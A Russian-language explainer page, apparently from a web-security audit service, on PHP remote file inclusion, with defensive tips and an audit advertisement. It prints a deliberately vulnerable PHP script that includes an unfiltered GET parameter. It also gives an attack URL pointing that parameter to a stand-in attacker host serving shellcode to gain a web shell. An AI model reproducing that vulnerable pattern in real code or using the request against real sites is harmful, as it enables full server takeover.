PHP include

Критическая уязвимость кода сайта. Максимальный уровень угрозы.

Информация на данной странице актуальна на сегодня - 20.04.2026

PHP include - удаленное включение PHP файла

PHP include является максимальной угрозой класса А1 по классификации OWASP

За последнее время эту страницу посетили 1902 посетителей

PHP include является RFI (Remote file include) уязвимостью для сайтов, созданных на PHP.

PHP include - это одна из самых грозных уязвимостей для сайта, созданного на PHP.
Эксплуатация PHP include представляет максимальную угрозу для атакуемого сайта, и во всех случаях приводит к его взлому
Возможность включения и выполнения удаленного PHP файла - в 100% случаев приводит к взлому сайта, так как обеспечивает получение веб-шелла на атакуемом сервере.

Возможность эксплуатации PHP include возникает из-за грубейших ошибок разработки сайта, отсутствия фильтрации передающих параметров, использование небезопасных функция и приемов программирования.

Пример уязвимого PHP скрипта (RFI PHP include):

Форма Файла http://vulnserver.com/vuln.html
<form метод="GET">
<select name="color">
<option color="red">красный</option>
<option color="blue">синий</option>
</select>
<input type="submit">
</form>

Файл http://vulnserver.com/vuln.php
<?
$color = "blue";
if (isset( $_GET[color] ) )
{
$color = $_GET[color];
include( $color . '.php' );
}
?>

Вызов скрипта:
http://vulnserver.com/vuln.php?color=http://devil_site.com/shellcode.php

Результат:
Выполнение веб-шелла на атакуемом сервере.

Разработчик сайта предполагает в качестве опции использовать только свои файлы blue.php и red.php
Злоумышленник, воспользовавшись уязвимостью в коде сайта, выполняет свой файл (шелл - код) на сервере жертвы, со своего сервера, получая полный доступ к атакуемому сайту.

Уязвимость PHP include на сайте - это максимальная угроза для его безопасности.

За последнее время эту страницу посетили 1903 посетителей

Защита от PHP include

Фильтрация параметров, передающих данные в eval(); assert(); include(); include_once(); require(); require_once(), create_function(), preg_replace() и т.д.
Отключение директивы allow_url_include в конфигурации php (если это возможно, и не нарушает работу сайта).
Проверка валидности запросов, серверного пути. Использование суперглобального массива $_SERVER.



Аудит безопасности сайта

Поиск и устранение PHP include и других уязвимостей сайта.

Подробнее